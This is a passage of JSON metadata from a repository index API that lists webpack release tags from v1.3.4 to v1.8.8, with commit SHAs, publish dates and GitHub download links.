api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"